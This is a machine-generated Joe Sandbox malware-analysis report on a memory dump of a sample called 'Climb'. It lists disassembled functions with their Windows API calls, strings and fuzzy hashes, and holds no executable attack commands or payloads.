Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 4d708b76975f137eb7c0f0d40d4efa6e0ac84831e78eb13760eba107060cb8a0
Instruction ID: ab4f23677ad42e949cdad655c379864ee2718e39c98d8356e9567333c5bdcaf5
Opcode Fuzzy Hash: 4d708b76975f137eb7c0f0d40d4efa6e0ac84831e78eb13760eba107060cb8a0
Instruction Fuzzy Hash: DD71BE725082118FC710EF38C99096AB7F8EFA8768F10492EF89697361EB31DD45CB91

Function 00AC6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00AC6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AC63A7
SetWindowTextW.USER32(?,?), ref: 00AC63BE
GetDlgItem.USER32(?,000003EA), ref: 00AC63D3
SetWindowTextW.USER32(00000000,?), ref: 00AC63D9
GetDlgItem.USER32(?,000003E9), ref: 00AC63E9
SetWindowTextW.USER32(00000000,?), ref: 00AC63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AC6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AC642A
GetWindowRect.USER32(?,?), ref: 00AC6433
_wcslen.LIBCMT ref: 00AC649A
SetWindowTextW.USER32(?,?), ref: 00AC64D6
GetDesktopWindow.USER32 ref: 00AC64DC
GetWindowRect.USER32(00000000), ref: 00AC64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AC653A
GetClientRect.USER32(?,?), ref: 00AC6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00AC656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AC6596

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 4428a245b97f1ac0cdd77590389bb8ece1f1aee2b638137d0071ef55f00f4d2e
Instruction ID: 306604055912a669545622f27c4902dccff9c640942e50c1bfa1d0c8a487c6e8
Opcode Fuzzy Hash: 4428a245b97f1ac0cdd77590389bb8ece1f1aee2b638137d0071ef55f00f4d2e
Instruction Fuzzy Hash: 4C718A31900609AFDB21DFA8CE85FAEBBF6FF48704F11091CE186A66A0D775E941CB50

Function 00AE086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00AE0884
LoadCursorW.USER32(00000000,00007F8A), ref: 00AE088F
LoadCursorW.USER32(00000000,00007F00), ref: 00AE089A
LoadCursorW.USER32(00000000,00007F03), ref: 00AE08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00AE08B0
LoadCursorW.USER32(00000000,00007F01), ref: 00AE08BB
LoadCursorW.USER32(00000000,00007F81), ref: 00AE08C6
LoadCursorW.USER32(00000000,00007F88), ref: 00AE08D1
LoadCursorW.USER32(00000000,00007F80), ref: 00AE08DC
LoadCursorW.USER32(00000000,00007F86), ref: 00AE08E7
LoadCursorW.USER32(00000000,00007F83), ref: 00AE08F2
LoadCursorW.USER32(00000000,00007F85), ref: 00AE08FD
LoadCursorW.USER32(00000000,00007F82), ref: 00AE0908
LoadCursorW.USER32(00000000,00007F84), ref: 00AE0913
LoadCursorW.USER32(00000000,00007F04), ref: 00AE091E
LoadCursorW.USER32(00000000,00007F02), ref: 00AE0929
GetCursorInfo.USER32(?), ref: 00AE0939
GetLastError.KERNEL32 ref: 00AE097B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 98bfe0295b42eb05bd51102d8d90508e85c49bb5776d57840a87b20a9927c312
Instruction ID: 1b82c664db49fe2c4a558caefa2165d4c2d824a6b6b64873eb097ae010e75b67
Opcode Fuzzy Hash: 98bfe0295b42eb05bd51102d8d90508e85c49bb5776d57840a87b20a9927c312
Instruction Fuzzy Hash: 0F415470D083596ADB10DFBA8C85C6EBFE8FF04754B50452AE11CEB282DB789841CF91

Function 00A80436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A80436

Part of subcall function 00A8045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00B3170C,00000FA0,F589D44D,?,?,?,?,00AA2733,000000FF), ref: 00A8048C
Part of subcall function 00A8045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AA2733,000000FF), ref: 00A80497
Part of subcall function 00A8045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AA2733,000000FF), ref: 00A804A8
Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A804BE
Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A804CC
Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A804DA
Part of subcall function 00A8045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A80505
Part of subcall function 00A8045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A80510

___scrt_fastfail.LIBCMT ref: 00A80457

Part of subcall function 00A80413: __onexit.LIBCMT ref: 00A80419

Strings

SleepConditionVariableCS, xrefs: 00A804C4
InitializeConditionVariable, xrefs: 00A804B8
WakeAllConditionVariable, xrefs: 00A804D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A80492
kernel32.dll, xrefs: 00A804A3

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: e91182b25fce978fbc0cdfdd3a8d881ad170247cc6453d980f164fcfb2c6823f
Instruction ID: 07eada30c690cdbd6a4eb562af784acdc21b0d8883353e418e6bab141834ad5d
Opcode Fuzzy Hash: e91182b25fce978fbc0cdfdd3a8d881ad170247cc6453d980f164fcfb2c6823f
Instruction Fuzzy Hash: 12213872A80705ABD7617BE8AC0AF6A37D9EB05B61F140625F901D72D0DF708C05CB64

Function 00AC3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC3AD9
_wcslen.LIBCMT ref: 00AC3B44

Strings

CLASSNN, xrefs: 00AC3B3F, 00AC3B50
TEXT, xrefs: 00AC3DC8
CLASS, xrefs: 00AC3AD4, 00AC3AF1
NAME, xrefs: 00AC3C81, 00AC3C92
INSTANCE, xrefs: 00AC3D9F
REGEXPCLASS, xrefs: 00AC3BA1, 00AC3BB2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 9c743bf8b03e13cea730336b4beb0b8dbd9cce8870ffba741f0ae171d3710ec3
Instruction ID: b60eb178a04debead6e762054b55e36042d5d252608bd6caebc01c5c0c9f1801
Opcode Fuzzy Hash: 9c743bf8b03e13cea730336b4beb0b8dbd9cce8870ffba741f0ae171d3710ec3
Instruction Fuzzy Hash: 54E1D033A04516ABCF189FB8C941BEDBBB5BF14710F12C16DE456E7250EB30AE998790

Function 00AD4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00AFDCD0), ref: 00AD4F6C
_wcslen.LIBCMT ref: 00AD4F80
_wcslen.LIBCMT ref: 00AD4FDE
_wcslen.LIBCMT ref: 00AD5039
_wcslen.LIBCMT ref: 00AD5084
_wcslen.LIBCMT ref: 00AD50EC

Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D

GetDriveTypeW.KERNEL32(?,00B27C10,00000061), ref: 00AD5188

Strings

fixed, xrefs: 00AD507A, 00AD507F
cdrom, xrefs: 00AD4FD4, 00AD4FD9
unknown, xrefs: 00AD514D
network, xrefs: 00AD50E2, 00AD50E7
removable, xrefs: 00AD502F, 00AD5034
ramdisk, xrefs: 00AD5136
all, xrefs: 00AD4F76, 00AD4F7B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 4114eb5841c624ce5889ebf2863f9ea8c32edf9313c827b087cc1fcc5a8fc4c4
Instruction ID: 205df0337f5c7dd87b1586d0c5c44aa47f99d1e33edd042caebea822535f342c
Opcode Fuzzy Hash: 4114eb5841c624ce5889ebf2863f9ea8c32edf9313c827b087cc1fcc5a8fc4c4
Instruction Fuzzy Hash: A6B1A231A087029FC714EF38C991A6AB7E5BFA8724F504A1EF596C7391DB30D845CB92

Function 00AEBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AEBBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC34
_wcslen.LIBCMT ref: 00AEBC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC96
_wcslen.LIBCMT ref: 00AEBD92

Part of subcall function 00AD0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00AD0F6D

_wcslen.LIBCMT ref: 00AEBDAB
_wcslen.LIBCMT ref: 00AEBDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AEBE16
GetLastError.KERNEL32(00000000), ref: 00AEBE67
CloseHandle.KERNEL32(?), ref: 00AEBE99
CloseHandle.KERNEL32(00000000), ref: 00AEBEAA
CloseHandle.KERNEL32(00000000), ref: 00AEBEBC
CloseHandle.KERNEL32(00000000), ref: 00AEBECE
CloseHandle.KERNEL32(?), ref: 00AEBF43

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 9fcf594b87f10c4dcae445c90de7c561c97d9fa3370c62e0d294267407576efd
Instruction ID: 9d282654f1b60afb807948bf19d25360f556da1c858d9778263daf7a2389f35e
Opcode Fuzzy Hash: 9fcf594b87f10c4dcae445c90de7c561c97d9fa3370c62e0d294267407576efd
Instruction Fuzzy Hash: F5F1BE716183409FC714EF25C995B6BBBF5AF88310F14895DF8968B2A2CB31EC45CB62

Function 00AE4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AFDCD0), ref: 00AE4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AE4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00AFDCD0), ref: 00AE4B4F
FreeLibrary.KERNEL32(00000000,?,00AFDCD0), ref: 00AE4B9B
StringFromGUID2.OLE32(?,?,00000028,?,00AFDCD0), ref: 00AE4C05
SysFreeString.OLEAUT32(00000009), ref: 00AE4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AE4D25
SysFreeString.OLEAUT32(?), ref: 00AE4D4F

Strings

kernel32.dll, xrefs: 00AE4B13
GetModuleHandleExW, xrefs: 00AE4B24

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 1d6f0266e8d4b1f4887f13659fef1c02e7f129b2758526ae4b61ce5e32f84e4a
Instruction ID: cc4beeafcbc84ae2bcf9e6ba4de936033ff8df5d490cbbfcca9aa1508949c6c0
Opcode Fuzzy Hash: 1d6f0266e8d4b1f4887f13659fef1c02e7f129b2758526ae4b61ce5e32f84e4a
Instruction Fuzzy Hash: 0E125E71A00145EFDB14DF95C884EAEBBB9FF89714F248098F909AB251D731ED46CBA0

Function 00A6381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00B329C0), ref: 00AA3F72
GetMenuItemCount.USER32(00B329C0), ref: 00AA4022
GetCursorPos.USER32(?), ref: 00AA4066
SetForegroundWindow.USER32(00000000), ref: 00AA406F
TrackPopupMenuEx.USER32(00B329C0,00000000,?,00000000,00000000,00000000), ref: 00AA4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AA408E

Strings

0, xrefs: 00A6382D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 47e88f947badc5e330154027cfd95821f97e65b5d48ecbb49781701cd287223d
Instruction ID: 9281f22483793463b2b79d60e12449fdbd19ea4aacc30af724cd4b76f8266dc3
Opcode Fuzzy Hash: 47e88f947badc5e330154027cfd95821f97e65b5d48ecbb49781701cd287223d
Instruction Fuzzy Hash: 8471E132A44205BEEF219F69DC49FAABF75FF06364F104216F624AB1E1C7B1A910DB50

Function 00AF7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00AF7823

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AF7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AF78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF78CC
DestroyWindow.USER32(?), ref: 00AF78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A60000,00000000), ref: 00AF791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7935
GetDesktopWindow.USER32 ref: 00AF794E
GetWindowRect.USER32(00000000), ref: 00AF7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AF7985

Part of subcall function 00A62234: GetWindowLongW.USER32(?,000000EB), ref: 00A62242

Strings

tooltips_class32, xrefs: 00AF7890, 00AF7915
0, xrefs: 00AF77D0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 13dc34f128c0aad51ba5d43fca0606a4cdf9f5a33a1d9a660069b7e00453daa1
Instruction ID: 2daf27d9dc7278f39cc5a76c65ee1d9fb461ede6bf7dc77c896f0e5c3980e323
Opcode Fuzzy Hash: 13dc34f128c0aad51ba5d43fca0606a4cdf9f5a33a1d9a660069b7e00453daa1
Instruction Fuzzy Hash: 78716870104248AFD762DF98CC88F7ABBF9FB89304F54456DFA8587261CBB0A946CB51

Function 00AF9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

DragQueryPoint.SHELL32(?,?), ref: 00AF9BA3

Part of subcall function 00AF80AE: ClientToScreen.USER32(?,?), ref: 00AF80D4
Part of subcall function 00AF80AE: GetWindowRect.USER32(?,?), ref: 00AF814A
Part of subcall function 00AF80AE: PtInRect.USER32(?,?,?), ref: 00AF815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AF9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AF9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AF9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00AF9CD3
DragFinish.SHELL32(?), ref: 00AF9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AF9DCD

Strings

@GUI_DRAGID, xrefs: 00AF9D45
@GUI_DROPID, xrefs: 00AF9CFA
@GUI_DRAGFILE, xrefs: 00AF9D7C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 5705a9cde952a8a0a79abc233d6bd67fd4b2a44104b9c2a86e8203508c1759d0
Instruction ID: 21efa21a18c2caf6ddc8e02422689dff38bd4f513d2a384f26c3133ab881e7b8
Opcode Fuzzy Hash: 5705a9cde952a8a0a79abc233d6bd67fd4b2a44104b9c2a86e8203508c1759d0
Instruction Fuzzy Hash: 47619B71108305AFC301EF90DD85EAFBBF9EF88750F50091DF691962A1DB309A4ACB62

Function 00ADCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00ADCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00ADCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00ADCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ADD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ADD035
InternetCloseHandle.WININET(00000000), ref: 00ADD040

Strings

, xrefs: 00ADCFBA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 4491b5dfe36d8abf4f56bd0e7623c29909bab4619b47fa7a2f74b1fc9ac0e792
Instruction ID: 78c31abe6e020c200523ce0a0ecd49f3a0a38927d976c6cbcf81518ef22c7ba8
Opcode Fuzzy Hash: 4491b5dfe36d8abf4f56bd0e7623c29909bab4619b47fa7a2f74b1fc9ac0e792
Instruction Fuzzy Hash: C4512AB1500705BFDB22DFA1C988ABA7BBDFB48754F00441AF94696250D734D946EBA0

Function 00AF8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AF66D6,?,?), ref: 00AF8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9016
GlobalLock.KERNEL32(00000000), ref: 00AF9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9033
GlobalUnlock.KERNEL32(00000000), ref: 00AF903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AF66D6,?,?,00000000,?), ref: 00AF9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B00C04,?), ref: 00AF906D
GlobalFree.KERNEL32(00000000), ref: 00AF907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00AF909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AF90CD
DeleteObject.GDI32(00000000), ref: 00AF90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AF910B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

